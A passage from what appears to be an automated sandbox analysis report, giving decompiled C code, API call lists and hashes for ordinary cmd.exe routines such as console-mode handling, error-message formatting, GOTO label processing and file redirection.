                                    					_t8 = _t114 + 2; // 0x2
                                    					_t122 = _t8;
                                    					do {
                                    						_t94 =  *_t114;
                                    						_t114 = _t114 + 2;
                                    					} while (_t94 != 0);
                                    					if(_t114 - _t122 >> 1 >= 0x10) {
                                    						goto L10;
                                    					}
                                    					E011E1040( &_v44, 0x10, _t124);
                                    					__imp___wcsupr( &_v44);
                                    					_t137 = _t137 + 4;
                                    					goto L18;
                                    				}
                                    				_t136 = _t136 - 8;
                                    				_t121 = 0;
                                    				_t127 = E011D5DB5(__ecx, 0);
                                    				if(_t127 == 0xffffffff) {
                                    					goto L5;
                                    				}
                                    				_t98 = E011E0178(_t97);
                                    				_t104 = _t127;
                                    				_t133 = _t98;
                                    				E011DDB92(_t127);
                                    				if(_t98 == 0) {
                                    					_t128 = 0;
                                    					goto L5;
                                    				}
                                    				_t74 = 2;
                                    				goto L53;
                                    			}
















































                                    APIs
                                    • _wcsupr.MSVCRT ref: 011F9629
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 011F968F
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F9697
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96A7
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96BD
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F96C5
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96D5
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96E9
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F974C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F9753
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 011F976C
                                    • towupper.MSVCRT ref: 011F978D
                                    • wcschr.MSVCRT ref: 011F97E6
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9818
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9826
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                    • String ID: <noalias>$CMD.EXE
                                    • API String ID: 2015057810-1690691951
                                    • Opcode ID: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction ID: 60a33344397155c4b31afdd1e785ca39ac74416fc1a4e70281673e98e544ff37
                                    • Opcode Fuzzy Hash: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction Fuzzy Hash: 5F81DA71E002189BDF28EFB8D858BEE7BB5AF55618F08021DFE02A7284DB719945CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 23%
                                    			E011F1C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
                                    				signed int _v8;
                                    				short _v520;
                                    				char* _v524;
                                    				signed int _v528;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t39;
                                    				intOrPtr _t45;
                                    				signed short* _t50;
                                    				void* _t53;
                                    				void* _t54;
                                    				signed short* _t58;
                                    				void* _t59;
                                    				void* _t60;
                                    				signed short* _t65;
                                    				void* _t74;
                                    				intOrPtr* _t75;
                                    				void* _t76;
                                    				intOrPtr* _t77;
                                    				signed int _t78;
                                    				void* _t79;
                                    				void* _t80;
                                    				void* _t81;
                                    				void* _t82;
                                    
                                    				_t73 = __edx;
                                    				_t39 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t39 ^ _t78;
                                    				_t65 = __ecx;
                                    				_v528 = __edx;
                                    				_t77 = _a4;
                                    				if(__edx == 0 || __ecx == 0) {
                                    					L31:
                                    					return E011E6FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
                                    				} else {
                                    					_push(_t74);
                                    					_t75 =  *0x121807c;
                                    					 *__ecx = 0;
                                    					if(_t75 == 0 ||  *0x1218081 == 0) {
                                    						L5:
                                    						_v524 = 0x11d30d8;
                                    						_t45 =  *_t77;
                                    						if(_t45 == 0) {
                                    							_v524 = "Exception";
                                    						} else {
                                    							_t59 = _t45 - 1;
                                    							if(_t59 == 0) {
                                    								_v524 = "ReturnHr";
                                    							} else {
                                    								_t60 = _t59 - 1;
                                    								if(_t60 == 0) {
                                    									_v524 = "LogHr";
                                    								} else {
                                    									if(_t60 == 1) {
                                    										_v524 = "FailFast";
                                    									}
                                    								}
                                    							}
                                    						}
                                    						_v520 = 0;
                                    						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
                                    						_push( *((intOrPtr*)(_t77 + 0x48)));
                                    						_push( *((intOrPtr*)(_t77 + 0x44)));
                                    						_t76 = _t65 + _v528 * 2;
                                    						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
                                    							_push(L"%hs!%p: ");
                                    							_push(_t76);
                                    							_push(_t65);
                                    							_t50 = E011F24CB();
                                    							_t80 = _t79 + 0x14;
                                    						} else {
                                    							_push( *((intOrPtr*)(_t77 + 0x20)));
                                    							_t50 = E011F24CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
                                    							_t80 = _t79 + 0x1c;
                                    						}
                                    						_t65 = _t50;
                                    						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
                                    							_t58 = E011F24CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
                                    							_t80 = _t80 + 0x10;
                                    							_t65 = _t58;
                                    						}
                                    						_push( &_v520);
                                    						_push( *(_t77 + 4));
                                    						_push(GetCurrentThreadId());
                                    						_push( *((intOrPtr*)(_t77 + 0x24)));
                                    						_t53 = E011F24CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
                                    						_t81 = _t80 + 0x20;
                                    						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
                                    							_push(L"    ");
                                    							_push(_t76);
                                    							_push(_t53);
                                    							_t54 = E011F24CB();
                                    							_t82 = _t81 + 0xc;
                                    							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
                                    								_t54 = E011F24CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
                                    								_t82 = _t82 + 0x10;
                                    							}
                                    							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
                                    								_t54 = E011F24CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
                                    								_t82 = _t82 + 0x10;
                                    							}
                                    							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
                                    								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
                                    									_push("\n");
                                    									_push(_t76);
                                    									_push(_t54);
                                    									E011F24CB();
                                    								} else {
                                    									E011F24CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
                                    								}
                                    							} else {
                                    								_push( *((intOrPtr*)(_t77 + 0x14)));
                                    								E011F24CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
                                    							}
                                    						}
                                    						goto L30;
                                    					} else {
                                    						 *0x12194b4(_t77, __ecx, __edx);
                                    						 *_t75();
                                    						if(( *__ecx & 0x0000ffff) != 0) {
                                    							L30:
                                    							_pop(_t74);
                                    							goto L31;
                                    						}
                                    						goto L5;
                                    					}
                                    				}
                                    			}





























                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 011F1D51
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 011F1DB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CurrentFormatMessageThread
                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                    • API String ID: 2411632146-2849347638
                                    • Opcode ID: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction ID: 11ef462c5647e08d3f75faa70b0c3cdbd028b8f7b44a4285ebacfc2e7a8eb1e1
                                    • Opcode Fuzzy Hash: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction Fuzzy Hash: F15122B1900711FBEB3DAF699C08EABBBB8EB54300F00455DF32A92552D7719980CB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E011DE560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
                                    				signed int _v8;
                                    				char _v24;
                                    				int _v28;
                                    				void* _v32;
                                    				intOrPtr _v36;
                                    				void* _v40;
                                    				void* _v48;
                                    				struct HINSTANCE__* _v552;
                                    				struct HINSTANCE__* _v556;
                                    				struct HINSTANCE__* _v560;
                                    				struct HINSTANCE__* _v564;
                                    				struct HINSTANCE__* _v568;
                                    				intOrPtr _v572;
                                    				void* _v576;
                                    				void* _v580;
                                    				void* _v584;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t60;
                                    				struct HINSTANCE__* _t63;
                                    				struct HINSTANCE__* _t67;
                                    				struct HINSTANCE__* _t71;
                                    				struct HINSTANCE__* _t72;
                                    				struct HINSTANCE__ _t74;
                                    				int _t77;
                                    				int _t82;
                                    				struct HINSTANCE__* _t84;
                                    				struct HINSTANCE__* _t91;
                                    				struct HINSTANCE__* _t92;
                                    				void* _t93;
                                    				struct HINSTANCE__* _t94;
                                    				struct HINSTANCE__* _t95;
                                    				struct HINSTANCE__* _t96;
                                    				struct HINSTANCE__* _t108;
                                    				struct HINSTANCE__** _t111;
                                    				void* _t112;
                                    				struct HINSTANCE__* _t118;
                                    				struct HINSTANCE__ _t124;
                                    				struct HINSTANCE__* _t143;
                                    				void* _t144;
                                    				struct HINSTANCE__* _t145;
                                    				struct HINSTANCE__* _t147;
                                    				void* _t148;
                                    				struct HINSTANCE__* _t149;
                                    				signed int _t150;
                                    				signed int _t152;
                                    				void* _t153;
                                    
                                    				_t136 = __edx;
                                    				_t152 = (_t150 & 0xfffffff8) - 0x234;
                                    				_t60 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t60 ^ _t152;
                                    				_t111 = __ecx;
                                    				_v556 = __edx;
                                    				_t147 = 0;
                                    				_t143 = 1;
                                    				_v564 = 0;
                                    				_v560 = 1;
                                    				_v552 = 0;
                                    				if( *0x1213cc4 != __ecx) {
                                    					L79:
                                    					_t63 = _t147;
                                    					goto L33;
                                    				} else {
                                    					L2:
                                    					while(1) {
                                    						if( *0x11fd544 != 0) {
                                    							E011F921A(_t111, _t143);
                                    							_t136 = _v556;
                                    						}
                                    						 *0x11fd590 = 0;
                                    						if( *0x1213cc9 == 0 || _t143 == 0) {
                                    							L5:
                                    							_t145 = E011E0662(_t111);
                                    							if(_t145 == 0xffffffff) {
                                    								goto L74;
                                    							}
                                    							_t67 = E011DEEF0(3, _t145, _t111[4]);
                                    							_t147 = _t67;
                                    							__imp___tell(_t145);
                                    							_t111[2] = _t67;
                                    							_t153 = _t152 + 4;
                                    							_t8 = _t145 - 3; // -3
                                    							_t118 = 0;
                                    							_t136 = _t145;
                                    							if(_t8 > 0x5b) {
                                    								L9:
                                    								__imp___close(_t145);
                                    								_t152 = _t153 + 4;
                                    								if(_t147 == 0) {
                                    									goto L42;
                                    								}
                                    								if(_t147 == 1 ||  *0x120f980 == 0x234a) {
                                    									E011F82EB(_t118);
                                    									__eflags =  *0x11fd0c8 - 1;
                                    									if( *0x11fd0c8 == 1) {
                                    										__eflags =  *0x1218530;
                                    										if( *0x1218530 == 0) {
                                    											E011F6FF0(_t118);
                                    											E011DC108(_t118, 0x2371, 1, 0x1203892);
                                    											_t152 = _t152 + 0xc;
                                    										}
                                    									}
                                    									E011F9287(_t118);
                                    									__imp__longjmp(0x120b8b8, 1);
                                    									goto L79;
                                    								} else {
                                    									if(_t147 == 0xffffffff) {
                                    										_t63 = _v564;
                                    										goto L33;
                                    									} else {
                                    										_t143 = _v560;
                                    										_t136 = _v552;
                                    										goto L14;
                                    									}
                                    								}
                                    							}
                                    							if(_t145 > 0x1f) {
                                    								_t49 = _t145 - 0x20; // -32
                                    								_t108 = 1 + (_t49 >> 5);
                                    								__eflags = _t108;
                                    								_t118 = _t108;
                                    								do {
                                    									_t136 = _t136 - 0x20;
                                    									_t108 = _t108 - 1;
                                    									__eflags = _t108;
                                    								} while (_t108 != 0);
                                    							}
                                    							asm("btr eax, edx");
                                    							goto L9;
                                    						} else {
                                    							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
                                    							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
                                    								goto L5;
                                    							}
                                    							_t147 = E011E00B0(0x50);
                                    							__eflags = _t147;
                                    							if(_t147 == 0) {
                                    								L74:
                                    								_t63 = 1;
                                    								L33:
                                    								_pop(_t144);
                                    								_pop(_t148);
                                    								_pop(_t112);
                                    								__eflags = _v8 ^ _t152;
                                    								return E011E6FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
                                    							}
                                    							_t147->i = 0;
                                    							_t71 = E011DDF40(L"GOTO");
                                    							 *(_t147 + 0x38) = _t71;
                                    							__eflags = _t71;
                                    							if(_t71 == 0) {
                                    								goto L74;
                                    							}
                                    							_t72 = E011DDF40( *((intOrPtr*)(_v556 + 0x38)));
                                    							 *(_t147 + 0x3c) = _t72;
                                    							__eflags = _t72;
                                    							if(_t72 == 0) {
                                    								goto L74;
                                    							}
                                    							_t136 = 1;
                                    							_t72->i = 0x20;
                                    							 *(_t147 + 0x40) = 0;
                                    							_v552 = 1;
                                    							L14:
                                    							if(_t143 != 0) {
                                    								__eflags = _t147;
                                    								if(_t147 != 0) {
                                    									_v560 = 0;
                                    								}
                                    							}
                                    							_t124 = _t147->i;
                                    							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
                                    								if(_t136 != 0) {
                                    									_v552 = 0;
                                    									_t74 = _t124;
                                    								} else {
                                    									_t74 = _t124;
                                    									if( *0x11fd0c8 == 1) {
                                    										_t74 = _t124;
                                    										__eflags = _t124 - 0x3b;
                                    										if(_t124 != 0x3b) {
                                    											__eflags =  *0x1218530;
                                    											_t74 = _t124;
                                    											if( *0x1218530 == 0) {
                                    												E011F6FF0(_t124);
                                    												_t136 = 0;
                                    												E011F2ED0(_t147, 0);
                                    												E011E25D9(L"\r\n");
                                    												_t74 = _t147->i;
                                    												_t152 = _t152 + 4;
                                    											}
                                    										}
                                    									}
                                    								}
                                    								if(_t74 == 0x3b) {
                                    									_t147 =  *(_t147 + 0x38);
                                    								}
                                    								_v28 = 0;
                                    								_v24 = 1;
                                    								 *(_t152 + 0x23c) = 0x104;
                                    								memset(_t152 + 0x24, 0, 0x104);
                                    								_t152 = _t152 + 0xc;
                                    								if(_v24 == 0) {
                                    									_t77 = 0x104;
                                    								} else {
                                    									_t77 = 0x7fe7;
                                    								}
                                    								if(E011E0C70(_t152 + 0x24, _t77) < 0) {
                                    									E011E0DE8(_t78, _t152 + 0x20);
                                    									goto L74;
                                    								} else {
                                    									if(_t147 == 0) {
                                    										_t147 = 0;
                                    										_v564 = 0;
                                    										L29:
                                    										__imp__??_V@YAXPAX@Z(_v28);
                                    										_t152 = _t152 + 4;
                                    										goto L30;
                                    									}
                                    									if( *_t147 != 0 || E011DDFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
                                    										L26:
                                    										_t136 = _t147;
                                    										_v564 = E011E0E00(2, _t147);
                                    										E011E06C0(2);
                                    										_t82 = GetConsoleOutputCP();
                                    										 *0x1203854 = _t82;
                                    										GetCPInfo(_t82, 0x1203840);
                                    										_t149 =  *0x11fd5f8; // 0x0
                                    										if(_t149 == 0) {
                                    											_t84 =  *0x11fd0d0; // 0xffffffff
                                    											__eflags = _t84 - 0xffffffff;
                                    											if(_t84 != 0xffffffff) {
                                    												L68:
                                    												__eflags = _t84;
                                    												if(_t84 != 0) {
                                    													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
                                    													 *0x11fd5f8 = _t149;
                                    												}
                                    												L70:
                                    												__eflags = _t149;
                                    												if(_t149 != 0) {
                                    													goto L27;
                                    												}
                                    												SetThreadLocale(0x409);
                                    												L28:
                                    												_t147 = _v568;
                                    												goto L29;
                                    											}
                                    											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
                                    											_t149 =  *0x11fd5f8; // 0x0
                                    											 *0x11fd0d0 = _t84;
                                    											__eflags = _t84 - 0xffffffff;
                                    											if(_t84 == 0xffffffff) {
                                    												goto L70;
                                    											}
                                    											goto L68;
                                    										}
                                    										L27:
                                    										 *0x12194b4(0);
                                    										_t149->i();
                                    										goto L28;
                                    									} else {
                                    										_t91 = E011DD7D4( *(_t147 + 0x38), 0x2a);
                                    										__eflags = _t91;
                                    										if(_t91 != 0) {
                                    											goto L26;
                                    										}
                                    										_t44 = _t91 + 0x3f; // 0x3f
                                    										_t92 = E011DD7D4( *(_t147 + 0x38), _t44);
                                    										__eflags = _t92;
                                    										if(_t92 != 0) {
                                    											goto L26;
                                    										}
                                    										_t141 = _v28;
                                    										__eflags = _v28;
                                    										if(__eflags == 0) {
                                    											_t141 = _t152 + 0x20;
                                    										}
                                    										_t93 = E011E10B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
                                    										__eflags = _t93 - 2;
                                    										if(_t93 != 2) {
                                    											goto L26;
                                    										} else {
                                    											__eflags =  *(_t147 + 0x34);
                                    											if( *(_t147 + 0x34) == 0) {
                                    												L62:
                                    												_t94 = _v28;
                                    												__eflags = _t94;
                                    												if(__eflags == 0) {
                                    													_t94 = _t152 + 0x20;
                                    												}
                                    												_t136 =  *_t111;
                                    												_push(_t94);
                                    												_push(_t111[1]);
                                    												_t95 = E011E1F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
                                    												__eflags = _t95;
                                    												if(_t95 != 0) {
                                    													goto L72;
                                    												} else {
                                    													_t147 = 0;
                                    													_v568 = 1;
                                    													_v572 = 0;
                                    													goto L29;
                                    												}
                                    											} else {
                                    												_t136 = _t147;
                                    												_t96 = E011F76C0(_v556, _t147);
                                    												__eflags = _t96;
                                    												if(_t96 != 0) {
                                    													L72:
                                    													__imp__??_V@YAXPAX@Z(_v36);
                                    													_t152 = _t152 + 4;
                                    													_t63 = 1;
                                    													goto L33;
                                    												}
                                    												goto L62;
                                    											}
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								L42:
                                    								_t147 = _v564;
                                    								L30:
                                    								if( *0x1213cc4 != _t111) {
                                    									goto L79;
                                    								}
                                    								_t143 = _v560;
                                    								_t136 = _v556;
                                    								continue;
                                    							}
                                    						}
                                    					}
                                    				}
                                    			}

                                    0x011ebf3a
                                    0x011ebf3a
                                    0x011ebf3c
                                    0x011ebf44
                                    0x00000000
                                    0x011ebf44
                                    0x011ebf07
                                    0x011ebf0b
                                    0x011ebf0d
                                    0x011ebf12
                                    0x011ebf14
                                    0x011ebfa2
                                    0x011ebfa9
                                    0x011ebfaf
                                    0x011ebfb2
                                    0x00000000
                                    0x011ebfb2
                                    0x00000000
                                    0x011ebf14
                                    0x011ebf05
                                    0x011de892
                                    0x011de704
                                    0x011de83d
                                    0x011de83d
                                    0x011de83d
                                    0x011de77b
                                    0x011de781
                                    0x00000000
                                    0x00000000
                                    0x011de787
                                    0x011de78b
                                    0x00000000
                                    0x011de78b
                                    0x011de673
                                    0x011de5cb
                                    0x011de5b0

                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1380661413-3584302480
                                    • Opcode ID: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction ID: 6dc516c65a3c5d278609d9408169d379666fc48460fcd179a318d4dcd9cfbe24
                                    • Opcode Fuzzy Hash: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction Fuzzy Hash: 53B1F4306097118BDB3DDFA8E45872A7BE1BF84719F05052DE9468B294EB71D885CF83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 21%
                                    			E011DD120(long __ecx, signed int __edx) {
                                    				void _v8;
                                    				long _v12;
                                    				long _v16;
                                    				long _v20;
                                    				signed int _v24;
                                    				long _v28;
                                    				struct _SECURITY_ATTRIBUTES _v40;
                                    				signed int _t34;
                                    				long _t37;
                                    				void* _t41;
                                    				signed int _t44;
                                    				signed int _t49;
                                    				int _t54;
                                    				signed char _t64;
                                    				void* _t67;
                                    				signed int _t71;
                                    				long _t75;
                                    				void* _t76;
                                    				signed int _t78;
                                    				signed int _t79;
                                    				void* _t81;
                                    
                                    				_t65 = __ecx;
                                    				_t75 = 3;
                                    				_v20 = __ecx;
                                    				_t64 = __edx;
                                    				_v16 = 3;
                                    				_t71 = __edx & 0x00000003;
                                    				_v40.bInheritHandle = 1;
                                    				_v40.lpSecurityDescriptor = 0;
                                    				_v40.nLength = 0xc;
                                    				if(_t71 > 2) {
                                    					L2:
                                    					return _t34 | 0xffffffff;
                                    				}
                                    				_t34 = __edx & 0x00000009;
                                    				if(_t34 != 9) {
                                    					if(_t71 != 0) {
                                    						_t78 = 0x40000000;
                                    						__imp___wcsicmp(__ecx, L"con");
                                    						_t81 = _t81 + 8;
                                    						if(_t34 != 0) {
                                    							_t75 = 1;
                                    							_v16 = 1;
                                    						}
                                    						_t65 = _v20;
                                    						_t37 = 2;
                                    					} else {
                                    						_t78 = 0x80000000;
                                    						_t37 = 3;
                                    					}
                                    					_push(0);
                                    					_push(0x80);
                                    					if(_t64 == 0x10a) {
                                    						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
                                    						_t76 = _t41;
                                    						if(_t76 != 0xffffffff) {
                                    							goto L9;
                                    						}
                                    						_push(0);
                                    						_push(0x80);
                                    						_push(4);
                                    						_push( &_v40);
                                    						_push(_v16);
                                    						_push(_t78);
                                    						_push(_v20);
                                    						goto L8;
                                    					} else {
                                    						_push(_t37);
                                    						_push( &_v40);
                                    						_push(_t75);
                                    						_push(_t78);
                                    						_push(_t65);
                                    						L8:
                                    						_t41 = CreateFileW();
                                    						_t76 = _t41;
                                    						if(_t76 == 0xffffffff) {
                                    							_t54 = GetLastError();
                                    							 *0x1213cf0 = _t54;
                                    							if(_t54 == 0x6e) {
                                    								 *0x1213cf0 = 2;
                                    							}
                                    							L28:
                                    							_t44 = _t54 | 0xffffffff;
                                    							L14:
                                    							return _t44;
                                    						}
                                    						L9:
                                    						__imp___open_osfhandle(_t76, 8);
                                    						_t79 = _t41;
                                    						if((_t64 & 0x00000008) != 0) {
                                    							if(E011E0178(_t41) != 0) {
                                    								goto L10;
                                    							}
                                    							_t49 = GetFileSize(_t76,  &_v20);
                                    							_v24 = _t49;
                                    							if((_t49 | _v20) == 0) {
                                    								goto L10;
                                    							}
                                    							_v12 = 0xffffffff;
                                    							_v8 = 0;
                                    							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
                                    								_t54 = GetLastError();
                                    								 *0x1213cf0 = _t54;
                                    								if(_t54 == 0) {
                                    									goto L23;
                                    								}
                                    								if(_t79 == 0xffffffff) {
                                    									_t54 = CloseHandle(_t76);
                                    								} else {
                                    									__imp___close(_t79);
                                    								}
                                    								goto L28;
                                    							}
                                    							L23:
                                    							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
                                    								_v12 = 0;
                                    								SetFilePointer(_t76, 0,  &_v12, 2);
                                    							}
                                    							if(_v8 == 0x1a) {
                                    								_v12 = 0xffffffff;
                                    								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
                                    							}
                                    						}
                                    						L10:
                                    						_t9 = _t79 - 3; // -3
                                    						_t67 = 0;
                                    						if(_t9 <= 0x5b) {
                                    							if(_t79 > 0x1f) {
                                    								_t33 = _t79 - 0x20; // -32
                                    								_t67 = (_t33 >> 5) + 1;
                                    							}
                                    							asm("bts eax, edx");
                                    						}
                                    						_t44 = _t79;
                                    						goto L14;
                                    					}
                                    				}
                                    				goto L2;
                                    			}

                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 011DD18E
                                    • _open_osfhandle.MSVCRT ref: 011DD1A2
                                    • _wcsicmp.MSVCRT ref: 011DD1EF
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,011FF830,00002000), ref: 011DD221
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 011DD25F
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011DD287
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 011DD2A3
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 011EB5B4
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011EB5CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 686027947-4257191772
                                    • Opcode ID: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction ID: 66505b56df8f293d09b86d5a0b2db156b08ff371d17eb2aad300261ee6bbb50f
                                    • Opcode Fuzzy Hash: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction Fuzzy Hash: AC51F870A00214ABEF28CBE8FC4DBBE7AF9EF45724F110219F925E22C4DB7199458751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E011DCEA9() {
                                    				signed int _v8;
                                    				long _v12;
                                    				char _v16;
                                    				int _v20;
                                    				void _v540;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t30;
                                    				WCHAR* _t41;
                                    				struct HINSTANCE__* _t50;
                                    				struct HINSTANCE__* _t52;
                                    				void* _t53;
                                    				int _t55;
                                    				void* _t56;
                                    				struct HINSTANCE__* _t78;
                                    				signed int _t79;
